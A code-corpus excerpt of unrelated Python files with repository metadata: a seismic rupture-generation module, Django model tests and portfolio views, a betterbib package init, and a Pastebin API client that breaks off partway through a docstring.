srcfile) for srcfile in self.r_srcfiles]
# Read src file
cfg = IrikuraGenSrfCfg(a_srcfiles)
# Define location of input velocity model and output srf file
if cfg.num_srcfiles > 1:
a_srffile = os.path.join(a_tmpdir, self.r_srffile)
a_final_srffile = os.path.join(a_indir, self.r_srffile)
else:
a_srffile = os.path.join(a_indir, self.r_srffile)
a_velmod = os.path.join(install.A_IN_DATA_DIR, str(sim_id),
self.r_velmodel)
# Run in tmpdir subdir to isolate temp fortran files
# Save cwd, change back to it at the end
old_cwd = os.getcwd()
os.chdir(a_tmpdir)
# Read parameters from the src(s) file(s)
# The following parameters should be common to all SRC files
# So we just read from the first one
simulation_seed = int(cfg.CFGDICT[0]['seed'])
dip = cfg.CFGDICT[0]['dip']
rake = cfg.CFGDICT[0]['rake']
dlen = cfg.CFGDICT[0]['dlen']
dwid = cfg.CFGDICT[0]['dwid']
lon_top_center = cfg.CFGDICT[0]['lon_top_center']
lat_top_center = cfg.CFGDICT[0]['lat_top_center']
depth_to_top = cfg.CFGDICT[0]['depth_to_top']
if cfg.num_srcfiles > 1:
fault_len = cfg.CFGDICT[0]['max_fault_length']
else:
fault_len = cfg.CFGDICT[0]['fault_length']
fault_width = cfg.CFGDICT[0]['fault_width']
# Average strike of all SRC files
strike = 0.0
for segment in range(cfg.num_srcfiles):
strike = strike + cfg.CFGDICT[segment]['strike']
strike = math.ceil(strike / cfg.num_srcfiles)
# Hypocenter (down_dip is common to all src files)
hypo_down_dip = cfg.CFGDICT[0]['hypo_down_dip']
if cfg.num_srcfiles > 1:
hypo_along_stk = 0.0
for segment in range(cfg.num_srcfiles):
current_fault_len = cfg.CFGDICT[segment]['fault_length']
current_hypo_along_stk = cfg.CFGDICT[segment]['hypo_along_stk']
if abs(current_hypo_along_stk) <= current_fault_len:
# Hypocenter in this segment!
hypo_along_stk = hypo_along_stk + (current_fault_len / 2.0) + current_hypo_along_stk
break
else:
# Not here yet, just add the total length of this segment
hypo_along_stk = hypo_along_stk + current_fault_len
# Now convert hypo_along_stk so that 0.0 is the middle of the fault
hypo_along_stk = hypo_along_stk - (fault_len / 2.0)
else:
hypo_along_stk = cfg.CFGDICT[0]['hypo_along_stk']
#
# Run gen_srf code
#
progstring = ("%s >> %s 2>&1 << END\n" %
(os.path.join(install.A_IRIKURA_BIN_DIR, cfg.GENSRF),
self.log) +
"%s\n" % a_srffile +
"%f %f %f %f %f\n" %
(fault_len, fault_width,
strike, dip, rake) +
"%f %f %f\n" %
(lon_top_center, lat_top_center, depth_to_top) +
"%f %f\n" % (dlen, dwid) +
"%f %f %f %f\n" %
(hypo_along_stk, hypo_down_dip,
cfg.DENS, cfg.VS) +
"%f\n" % (cfg.DT) +
"%d\n" % (simulation_seed) +
"%s\n" % (a_velmod) +
"%f\n" % (cfg.VEL_RUP_FRAC) +
"END")
bband_utils.runprog(progstring)
if cfg.num_srcfiles > 1:
# Assign the slip from the planar fault to each segment's SRF file
a_segs_file = os.path.join(a_tmpdir, "segments.midpoint.txt")
# Write segments' file
seg_file = open(a_segs_file, 'w')
seg_file.write("segm lon lat depth fleng fwidth shypo zhypo strike dip rake\n")
seg_file.write("%d\n" % (cfg.num_srcfiles))
total_length = 0.0
for segment in range(cfg.num_srcfiles):
if abs(cfg.CFGDICT[segment]['hypo_along_stk']) <= cfg.CFGDICT[segment]['fault_length']:
hypo_along_stk = cfg.CFGDICT[segment]['hypo_along_stk']
hypo_down_dip = cfg.CFGDICT[segment]['hypo_down_dip']
else:
hypo_along_stk = 999.0
hypo_down_dip = 999.0
seg_file.write("seg%d %.6f %.6f %.1f %.1f %.1f %.1f %.1f %.1f %d %d %d\n" %
(segment + 1,
cfg.CFGDICT[segment]['lon_top_center'],
cfg.CFGDICT[segment]['lat_top_center'],
cfg.CFGDICT[segment]['depth_to_top'],
total_length,
(total_length + cfg.CFGDICT[segment]['fault_length']),
cfg.CFGDICT[segment]['fault_width'],
hypo_along_stk, hypo_down_dip,
cfg.CFGDICT[segment]['strike'],
cfg.CFGDICT[segment]['dip'],
cfg.CFGDICT[segment]['rake']))
total_length = total_length + cfg.CFGDICT[segment]['fault_length']
seg_file.close()
#
# Run gen_srf_segment code
#
for segment in range(cfg.num_srcfiles):
progstring = ("%s >> %s 2>&1 << END\n" %
(os.path.join(install.A_IRIKURA_BIN_DIR,
cfg.GENSRFSEGMENT), self.log) +
".\n" +
"%s\n" % (self.r_srffile) +
"./segments.midpoint.txt\n" +
"%d\n" % (segment + 1) +
"%f %f\n" % (dlen, dwid) +
"END")
# Run code
bband_utils.runprog(progstring)
#
# Now add the segments together
#
progstring = ("%s >> %s 2>&1 << END\n" %
(os.path.join(install.A_IRIKURA_BIN_DIR,
cfg.SUMSEG), self.log) +
".\n" +
"%s\n" % (self.r_srffile) +
"./segments.midpoint.txt\n" +
"%d\n" % (cfg.num_srcfiles) +
"%f %f\n" % (dlen, dwid) +
"END")
# Run code
bband_utils.runprog(progstring)
# Copy file to final location
progstring = "cp %s %s" % (os.path.join(a_tmpdir,
"all_seg.%s" %
(self.r_srffile)),
a_final_srffile)
bband_utils.runprog(progstring)
# Use copied file from now on
a_srffile = a_final_srffile
# Restore working directory
os.chdir(old_cwd)
#
# Move results to outputfile
#
progstring = "cp %s %s" % (a_srffile,
os.path.join(a_tmpdir, self.r_srffile))
bband_utils.runprog(progstring)
progstring = "cp %s %s" % (a_srffile,
os.path.join(a_outdir, self.r_srffile))
bband_utils.runprog(progstring)
shutil.copy2(os.path.join(a_tmpdir, "stress_drop.out"),
os.path.join(a_param_outdir,
"stress_drop.out"))
# Plot SRF
plot_srf.run(self.r_srffile, sim_id=self.sim_id)
print("IrikuraGenSrf Completed".center(80, '-'))
if __name__ == "__main__":
print("Testing Module: %s" % os.path.basename((sys.argv[0])))
ME = IrikuraGenSrf(sys.argv[1], sys.argv[2], sys.argv[3],
sys.argv[4], sim_id=int(sys.argv[5]))
ME.run()
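
# --- Worked example (editorial addition, not part of the original module) ---
# Illustration of the multi-segment hypo_along_stk conversion in run(): with
# two segments of 10 km and 20 km (max_fault_length = 30 km), the first
# segment's hypo_along_stk set to the 999.0 sentinel, and the hypocenter
# 2 km past the midpoint of segment 2 (hypo_along_stk = 2.0 in that SRC
# file), the loop accumulates 10 + 20/2 + 2 = 22 km from the start of the
# fault; subtracting half the total length gives 22 - 15 = 7 km relative to
# the overall fault midpoint, which is the value passed to gen_srf.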
| 2.21875 | 2 |
core/tests/test_models.py | EthanMarrs/digit2 | 0 | 6836 | """test_models.py: runs tests on the models for digit."""
import pytest
from core.models import (Grade,
Subject,
Question,
Comment,
Option,
Topic,
Block,
Syllabus,
StateException,
)
from django.test import TestCase
from django.contrib.auth.models import User
class TestQuestion(TestCase):
"""Test the Question Model."""
def setUp(self):
"""Create questions for testing."""
grade_test = Grade(name="Grade Example")
grade_test.save()
subject_test = Subject(name="addition",
grade=grade_test)
subject_test.save()
question1 = Question(question_content='what is 1 + 1?',
answer_content='This is an addition question',
subject=subject_test)
question1.save()
def test_question_default_state(self):
"""Confirm that default state is Incomplete."""
question1 = Question.objects.all()[0]
assert(question1.state == question1.INCOMPLETE)
def test_question_state_from_incomplete(self):
"""Check that question state.
Confirm that state can only go from 'incomplete' to
'ready for review'.
"""
question1 = Question.objects.all()[0]
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 0")
assert(question1.state == question1.INCOMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_complete()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 0")
assert(question1.state == question1.INCOMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 0")
assert(question1.state == question1.INCOMPLETE)
question1.change_to_review_ready()
assert(question1.state == question1.REVIEW_READY)
def test_question_state_from_ready_for_review(self):
"""Check that question state.
Confirm that state can only go from 'ready to review' to
'complete' or 'needs reworking'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.REVIEW_READY
with pytest.raises(StateException) as exception_info:
question1.change_to_review_ready()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 1")
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 1")
assert(question1.state == question1.REVIEW_READY)
question1.change_to_complete()
assert(question1.state == question1.COMPLETE)
question1.state = question1.REVIEW_READY
question1.change_to_needs_reworking()
assert(question1.state == question1.NEEDS_REWORKING)
def test_question_state_from_needs_reworking(self):
"""Check that question state.
Confirm that state can only go from 'needs reworking' to
'ready for review'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.NEEDS_REWORKING
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 2")
assert(question1.state == question1.NEEDS_REWORKING)
with pytest.raises(StateException) as exception_info:
question1.change_to_complete()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 2")
assert(question1.state == question1.NEEDS_REWORKING)
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 2")
assert(question1.state == question1.NEEDS_REWORKING)
question1.change_to_review_ready()
assert(question1.state == question1.REVIEW_READY)
def test_question_state_from_complete(self):
"""Check that question state.
Confirm that state can only go from 'complete' to
'flagged for review'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.COMPLETE
with pytest.raises(StateException) as exception_info:
question1.change_to_review_ready()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 3")
assert(question1.state == question1.COMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_complete()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 3")
assert(question1.state == question1.COMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 3")
assert(question1.state == question1.COMPLETE)
question1.change_to_flagged()
assert(question1.state == question1.FLAGGED)
def test_question_state_from_flagged_for_review(self):
"""Check that question state.
Confirm that state can only go from 'flagged for review' to
'complete'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.FLAGGED
with pytest.raises(StateException) as exception_info:
question1.change_to_review_ready()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 4")
assert(question1.state == question1.FLAGGED)
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 4")
assert(question1.state == question1.FLAGGED)
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 4")
assert(question1.state == question1.FLAGGED)
question1.change_to_complete()
assert(question1.state == question1.COMPLETE)
def test_question_option_save(self):
"""Test that question cannot have option with correct answer."""
question1 = Question.objects.all()[0]
option = Option.objects.first()
option.correct = True
option.save()
assert(len(question1.option_set.all()) == 3)
assert(len(Option.objects.all()) == 3)
def test_get_comments(self):
"""
Test that the get_comments() function returns all comments
relating to a question.
"""
user = User.objects.create(username="testuser")
question1 = Question.objects.all()[0]
Comment.objects.create(text="Test comment!", question=question1, user=user)
Comment.objects.create(text="Another comment!", question=question1, user=user)
assert(len(question1.get_comments()) == 2)
assert(question1.get_comments()[0].text == "Test comment!")
assert(question1.get_comments()[0].created_at < question1.get_comments()[1].created_at)
def test_get_options(self):
"""
Test that the get_options() function returns all options
relating to a question.
"""
question1 = Question.objects.all()[0]
assert(question1.get_number_of_options() == 3)
def test_get_state(self):
question1 = Question.objects.all()[0]
assert(question1.state == question1.INCOMPLETE)
assert(question1.get_state() == "Incomplete")
class TestTopic(TestCase):
"""Test the Topic Model."""
def setUp(self):
"""Create Topic for testing."""
grade_test = Grade.objects.create(name="Grade Example")
syllabus_test = Syllabus.objects.create(grade=grade_test)
Topic.objects.create(name="Financial Mathematics",
description="Topic that involves sinking funds "
"and loan calculations",
syllabus=syllabus_test, week_start=1,
duration=3)
def test_topic_creates_blocks(self):
"""
Confirm that blocks are created automatically and associated with the
topic.
"""
blocks = Block.objects.all()
assert(len(blocks) == 3)
assert(blocks[0].topic.name == "Financial Mathematics")
def test_topic_creates_questions(self):
"""
Confirm that questions are created automatically and associated with the
correct block and topic.
"""
questions = Question.objects.all()
assert(len(questions) == 3 * 15)
assert(questions[0].block.topic.name == "Financial Mathematics")
def test_topic_number_of_questions(self):
"""
Confirm that the correct number of questions is returned by the helper
function.
"""
questions = Question.objects.all()
topics = Topic.objects.all()
assert(len(questions) == topics[0].get_number_of_questions())
def test_topic_number_of_blocks(self):
"""
Confirm that the correct number of blocks is returned by the helper
function.
"""
blocks = Block.objects.all()
topics = Topic.objects.all()
assert(len(blocks) == topics[0].get_number_of_blocks())
def test_topic_save_does_not_duplicate_questions(self):
already_created_topic = Topic.objects.get(name="Financial Mathematics")
count = 0
for block in Block.objects.filter(topic=already_created_topic):
for question in Question.objects.filter(block=block):
count += 1
assert(count == 45)
new_description = "This is a new description"
already_created_topic.description = new_description
already_created_topic.save()
edited_topic = Topic.objects.get(name="Financial Mathematics")
count = 0
for block in Block.objects.filter(topic=edited_topic):
for question in Question.objects.filter(block=block):
count += 1
assert(count == 45)
| 2.921875 | 3 |
betterbib/__init__.py | tbabej/betterbib | 0 | 6837 | <filename>betterbib/__init__.py
# -*- coding: utf-8 -*-
#
from __future__ import print_function
from betterbib.__about__ import (
__version__,
__author__,
__author_email__,
__website__,
)
from betterbib.tools import (
create_dict,
decode,
pybtex_to_dict,
pybtex_to_bibtex_string,
write,
update,
JournalNameUpdater,
translate_month
)
from betterbib.crossref import Crossref
from betterbib.dblp import Dblp
try:
import pipdate
except ImportError:
pass
else:
if pipdate.needs_checking(__name__):
print(pipdate.check(__name__, __version__), end='')
| 2.09375 | 2 |
base/views.py | omololevy/my_portfolio | 2 | 6838 | from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.core.mail import EmailMessage
from django.conf import settings
from django.template.loader import render_to_string
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.forms import UserCreationForm
from .decorators import *
from .forms import PostForm, CustomUserCreationForm, ProfileForm, UserForm
from .filters import PostFilter
from .models import *
# Create your views here.
def home(request):
posts = Post.objects.filter(active=True, featured=True)[0:3]
context = {'posts':posts}
return render(request, 'base/index.html', context)
def posts(request):
posts = Post.objects.filter(active=True)
myFilter = PostFilter(request.GET, queryset=posts)
posts = myFilter.qs
page = request.GET.get('page')
paginator = Paginator(posts, 5)
try:
posts = paginator.page(page)
except PageNotAnInteger:
posts = paginator.page(1)
except EmptyPage:
posts = paginator.page(paginator.num_pages)
context = {'posts':posts, 'myFilter':myFilter}
return render(request, 'base/posts.html', context)
def post(request, slug):
post = Post.objects.get(slug=slug)
if request.method == 'POST':
PostComment.objects.create(
author=request.user.profile,
post=post,
body=request.POST['comment']
)
messages.success(request, "Your comment has been posted successfully!")
return redirect('post', slug=post.slug)
context = {'post':post}
return render(request, 'base/post.html', context)
def profile(request):
return render(request, 'base/profile.html')
#CRUD VIEWS
@admin_only
@login_required(login_url="home")
def createPost(request):
form = PostForm()
if request.method == 'POST':
form = PostForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('posts')
context = {'form':form}
return render(request, 'base/post_form.html', context)
@admin_only
@login_required(login_url="home")
def updatePost(request, slug):
post = Post.objects.get(slug=slug)
form = PostForm(instance=post)
if request.method == 'POST':
form = PostForm(request.POST, request.FILES, instance=post)
if form.is_valid():
form.save()
return redirect('posts')
context = {'form':form}
return render(request, 'base/post_form.html', context)
@admin_only
@login_required(login_url="home")
def deletePost(request, slug):
post = Post.objects.get(slug=slug)
if request.method == 'POST':
post.delete()
return redirect('posts')
context = {'item':post}
return render(request, 'base/delete.html', context)
def sendEmail(request):
if request.method == 'POST':
template = render_to_string('base/email_template.html', {
'name':request.POST['name'],
'email':request.POST['email'],
'message':request.POST['message'],
})
email = EmailMessage(
request.POST['subject'],
template,
settings.EMAIL_HOST_USER,
['<EMAIL>']
)
email.fail_silently=False
email.send()
return render(request, 'base/email_sent.html')
def loginPage(request):
if request.user.is_authenticated:
return redirect('home')
if request.method == 'POST':
email = request.POST.get('email')
password =request.POST.get('password')
#Little Hack to work around re-building the usermodel
try:
user = User.objects.get(email=email)
user = authenticate(request, username=user.username, password=password)
except:
            messages.error(request, 'User with this email does not exist')
return redirect('login')
if user is not None:
login(request, user)
return redirect('home')
else:
messages.error(request, 'Email OR password is incorrect')
context = {}
return render(request, 'base/login.html', context)
def registerPage(request):
form = CustomUserCreationForm()
if request.method == 'POST':
form = CustomUserCreationForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.save()
            messages.success(request, 'Account successfully created!')
user = authenticate(request, username=user.username, password=request.POST['<PASSWORD>'])
if user is not None:
login(request, user)
next_url = request.GET.get('next')
if next_url == '' or next_url == None:
next_url = 'home'
return redirect(next_url)
else:
            messages.error(request, 'An error has occurred with registration')
context = {'form':form}
return render(request, 'base/register.html', context)
def logoutUser(request):
logout(request)
return redirect('home')
@admin_only
@login_required(login_url="home")
def userAccount(request):
profile = request.user.profile
context = {'profile':profile}
return render(request, 'base/account.html', context)
@login_required(login_url="home")
def updateProfile(request):
user = request.user
profile = user.profile
form = ProfileForm(instance=profile)
if request.method == 'POST':
user_form = UserForm(request.POST, instance=user)
if user_form.is_valid():
user_form.save()
form = ProfileForm(request.POST, request.FILES, instance=profile)
if form.is_valid():
form.save()
return redirect('account')
context = {'form':form}
return render(request, 'base/profile_form.html', context)
def myEducation(request):
return render(request, 'base/education.html')
def myExperience(request):
return render(request, 'base/experience.html')
def myAchievements(request):
return render(request, 'base/achievements.html')
def myAbout(request):
return render(request, 'base/about.html')
def myContact(request):
return render(request, 'base/contact.html')
def mySkills(request):
return render(request, 'base/skills.html')
| 2.140625 | 2 |
radioLib/pastebin/pastebin.py | hephaestus9/Radio | 1 | 6839 | <reponame>hephaestus9/Radio
#!/usr/bin/env python
#############################################################################
# Pastebin.py - Python 3.2 Pastebin API.
# Copyright (C) 2012 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#############################################################################
# This software is a derivative work of:
# http://winappdbg.sourceforge.net/blog/pastebin.py
#############################################################################
__ALL__ = ['delete_paste', 'user_details', 'trending', 'pastes_by_user', 'generate_user_key',
'legacy_paste', 'paste', 'Pastebin', 'PastebinError']
import sys
try:
    # Python 3
    from urllib.request import urlopen
    from urllib.parse import urlencode
except ImportError:
    # Python 2 fallback
    from urllib import urlopen, urlencode
class PastebinError(RuntimeError):
"""Pastebin API error.
The error message returned by the web application is stored as the Python exception message."""
class PastebinAPI(object):
"""Pastebin API interaction object.
Public functions:
paste -- Pastes a user-specified file or string using the new API-key POST method.
legacy_paste -- Pastes a user-specified file or string using the old anonymous POST method.
generate_user_key -- Generates a session-key that is required for other functions.
pastes_by_user -- Returns all public pastes submitted by the specified login credentials.
trending -- Returns the top trending paste.
user_details -- Returns details about the user for the specified API user key.
    delete_paste -- Deletes the paste specified by the api_paste_key."""
# String to determine bad API requests
_bad_request = 'Bad API request'
# Base domain name
_base_domain = 'pastebin.com'
    # Valid Pastebin URLs begin with this string (kinda obvious)
_prefix_url = 'http://%s/' % _base_domain
# Valid Pastebin URLs with a custom subdomain begin with this string
_subdomain_url = 'http://%%s.%s/' % _base_domain
# URL to the LEGACY POST API
_legacy_api_url= 'http://%s/api_public.php' % _base_domain
# URL to the POST API
_api_url= 'http://%s/api/api_post.php' % _base_domain
# URL to the login POST API
_api_login_url= 'http://%s/api/api_login.php' % _base_domain
# Valid paste_expire_date values (Never, 10 minutes, 1 Hour, 1 Day, 1 Month)
paste_expire_date = ('N', '10M', '1H', '1D', '1M')
    # Valid paste_private values (0 = public, 1 = unlisted, 2 = private)
paste_private = ('public', 'unlisted', 'private')
# Valid parse_format values
paste_format = (
'4cs', # 4CS
'6502acme', # 6502 ACME Cross Assembler
'6502kickass', # 6502 Kick Assembler
'6502tasm', # 6502 TASM/64TASS
'abap', # ABAP
'actionscript', # ActionScript
'actionscript3', # ActionScript 3
'ada', # Ada
'algol68', # ALGOL 68
'apache', # Apache Log
'applescript', # AppleScript
'apt_sources', # APT Sources
'asm', # ASM (NASM)
'asp', # ASP
'autoconf', # autoconf
'autohotkey', # Autohotkey
'autoit', # AutoIt
'avisynth', # Avisynth
'awk', # Awk
'bascomavr', # BASCOM AVR
'bash', # Bash
'basic4gl', # Basic4GL
'bibtex', # BibTeX
'blitzbasic', # Blitz Basic
'bnf', # BNF
'boo', # BOO
'bf', # BrainFuck
'c', # C
'c_mac', # C for Macs
'cil', # C Intermediate Language
'csharp', # C#
'cpp', # C++
'cpp-qt', # C++ (with QT extensions)
'c_loadrunner', # C: Loadrunner
'caddcl', # CAD DCL
'cadlisp', # CAD Lisp
'cfdg', # CFDG
'chaiscript', # ChaiScript
'clojure', # Clojure
'klonec', # Clone C
'klonecpp', # Clone C++
'cmake', # CMake
'cobol', # COBOL
'coffeescript', # CoffeeScript
'cfm', # ColdFusion
'css', # CSS
'cuesheet', # Cuesheet
'd', # D
'dcs', # DCS
'delphi', # Delphi
'oxygene', # Delphi Prism (Oxygene)
'diff', # Diff
'div', # DIV
'dos', # DOS
'dot', # DOT
'e', # E
'ecmascript', # ECMAScript
'eiffel', # Eiffel
'email', # Email
'epc', # EPC
'erlang', # Erlang
'fsharp', # F#
'falcon', # Falcon
'fo', # FO Language
'f1', # Formula One
'fortran', # Fortran
'freebasic', # FreeBasic
'freeswitch', # FreeSWITCH
'gambas', # GAMBAS
'gml', # Game Maker
'gdb', # GDB
'genero', # Genero
'genie', # Genie
'gettext', # GetText
'go', # Go
'groovy', # Groovy
'gwbasic', # GwBasic
'haskell', # Haskell
'hicest', # HicEst
'hq9plus', # HQ9 Plus
'html4strict', # HTML
'html5', # HTML 5
'icon', # Icon
'idl', # IDL
'ini', # INI file
'inno', # Inno Script
'intercal', # INTERCAL
'io', # IO
'j', # J
'java', # Java
'java5', # Java 5
'javascript', # JavaScript
'jquery', # jQuery
'kixtart', # KiXtart
'latex', # Latex
'lb', # Liberty BASIC
'lsl2', # Linden Scripting
'lisp', # Lisp
'llvm', # LLVM
'locobasic', # Loco Basic
'logtalk', # Logtalk
'lolcode', # LOL Code
'lotusformulas', # Lotus Formulas
'lotusscript', # Lotus Script
'lscript', # LScript
'lua', # Lua
'm68k', # M68000 Assembler
'magiksf', # MagikSF
'make', # Make
'mapbasic', # MapBasic
'matlab', # MatLab
'mirc', # mIRC
        'mmix',             # MMIX Assembler
'modula2', # Modula 2
'modula3', # Modula 3
'68000devpac', # Motorola 68000 HiSoft Dev
'mpasm', # MPASM
'mxml', # MXML
'mysql', # MySQL
'newlisp', # newLISP
'text', # None
'nsis', # NullSoft Installer
'oberon2', # Oberon 2
        'objeck',           # Objeck Programming Language
'objc', # Objective C
        'ocaml-brief',      # OCaml Brief
'ocaml', # OCaml
'pf', # OpenBSD PACKET FILTER
'glsl', # OpenGL Shading
'oobas', # Openoffice BASIC
'oracle11', # Oracle 11
'oracle8', # Oracle 8
'oz', # Oz
'pascal', # Pascal
'pawn', # PAWN
'pcre', # PCRE
'per', # Per
'perl', # Perl
'perl6', # Perl 6
'php', # PHP
'php-brief', # PHP Brief
'pic16', # Pic 16
'pike', # Pike
'pixelbender', # Pixel Bender
'plsql', # PL/SQL
'postgresql', # PostgreSQL
'povray', # POV-Ray
'powershell', # Power Shell
'powerbuilder', # PowerBuilder
'proftpd', # ProFTPd
'progress', # Progress
'prolog', # Prolog
'properties', # Properties
'providex', # ProvideX
'purebasic', # PureBasic
'pycon', # PyCon
'python', # Python
'q', # q/kdb+
'qbasic', # QBasic
'rsplus', # R
'rails', # Rails
'rebol', # REBOL
'reg', # REG
'robots', # Robots
'rpmspec', # RPM Spec
'ruby', # Ruby
'gnuplot', # Ruby Gnuplot
'sas', # SAS
'scala', # Scala
'scheme', # Scheme
'scilab', # Scilab
'sdlbasic', # SdlBasic
'smalltalk', # Smalltalk
'smarty', # Smarty
'sql', # SQL
'systemverilog', # SystemVerilog
'tsql', # T-SQL
'tcl', # TCL
'teraterm', # Tera Term
'thinbasic', # thinBasic
'typoscript', # TypoScript
'unicon', # Unicon
'uscript', # UnrealScript
'vala', # Vala
'vbnet', # VB.NET
'verilog', # VeriLog
'vhdl', # VHDL
'vim', # VIM
'visualprolog', # Visual Pro Log
'vb', # VisualBasic
'visualfoxpro', # VisualFoxPro
'whitespace', # WhiteSpace
'whois', # WHOIS
'winbatch', # Winbatch
'xbasic', # XBasic
'xml', # XML
'xorg_conf', # Xorg Config
'xpp', # XPP
'yaml', # YAML
'z80', # Z80 Assembler
'zxbasic', # ZXBasic
)
def __init__(self):
pass
def delete_paste(self, api_dev_key, api_user_key, api_paste_key):
"""Delete the paste specified by the api_paste_key.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> paste_to_delete = x.delete_paste('453a994e0e2f1efae07f8759e59e075b',
... 'c57a18e6c0ae228cd4bd16fe36da381a',
... 'WkgcTFtv')
>>> print paste_to_delete
Paste Removed
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
@type api_paste_key: string
@param api_paste_key: The Paste Key of the paste to be deleted (string after final / in U{http://pastebin.com} URL).
@rtype: string
@returns: A successful deletion returns 'Paste Removed'.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered account
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
# Key of the paste to be deleted.
if api_paste_key is not None:
argv['api_paste_key'] = str(api_paste_key)
        # Valid API option - 'delete' in this instance
        argv['api_option'] = str('delete')
        # lets try to read the URL that we've just built.
        request_string = urlopen(self._api_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
        # do some basic error checking here so we can gracefully handle any errors we are likely to encounter
        if response.startswith(self._bad_request):
            raise PastebinError(response)
        return response
def user_details(self, api_dev_key, api_user_key):
"""Return user details of the user specified by the api_user_key.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> details = x.user_details('453a994e0e2f1efae07f8759e59e075b',
... 'c57a18e6c0ae228cd4bd16fe36da381a')
>>> print details
<user>
<user_name>MonkeyPuzzle</user_name>
<user_format_short>python</user_format_short>
<user_expiration>N</user_expiration>
<user_avatar_url>http://pastebin.com/i/guest.gif</user_avatar_url>
<user_private>0</user_private>
<user_website></user_website>
<user_email><EMAIL></user_email>
<user_location></user_location>
<user_account_type>0</user_account_type>
</user>
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
@rtype: string
@returns: Returns an XML string containing user information.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered account to generate an api_user_key (see generate_user_key)
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
# Valid API option - 'user_details' in this instance
argv['api_option'] = str('userdetails')
# lets try to read the URL that we've just built.
        request_string = urlopen(self._api_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith('<user>'):
raise PastebinError(response)
return response
def trending(self, api_dev_key):
"""Returns the top trending paste details.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> details = x.trending('453a994e0e2f1efae07f8759e59e075b')
>>> print details
<paste>
<paste_key><KEY></paste_key>
<paste_date>1333230838</paste_date>
<paste_title></paste_title>
<paste_size>6416</paste_size>
<paste_expire_date>0</paste_expire_date>
<paste_private>0</paste_private>
<paste_format_long>None</paste_format_long>
<paste_format_short>text</paste_format_short>
<paste_url>http://pastebin.com/jjMRFDH6</paste_url>
<paste_hits>6384</paste_hits>
</paste>
Note: Returns multiple trending pastes, not just 1.
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@rtype: string
@return: Returns the string (XML formatted) containing the top trending pastes.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
        # Valid API option - 'trends' returns trending pastes
argv['api_option'] = str('trends')
# lets try to read the URL that we've just built.
        request_string = urlopen(self._api_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith('<paste>'):
raise PastebinError(response)
return response
def pastes_by_user(self, api_dev_key, api_user_key, results_limit = None):
"""Returns all pastes for the provided api_user_key.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> details = x.user_details('453a994e0e2f1efae07f8759e59e075b',
... 'c57a18e6c0ae228cd4bd16fe36da381a',
... 100)
>>> print details
<paste>
<paste_key>DLiSspYT</paste_key>
<paste_date>1332714730</paste_date>
<paste_title>Pastebin.py - Python 3.2 Pastebin.com API</paste_title>
<paste_size>25300</paste_size>
<paste_expire_date>0</paste_expire_date>
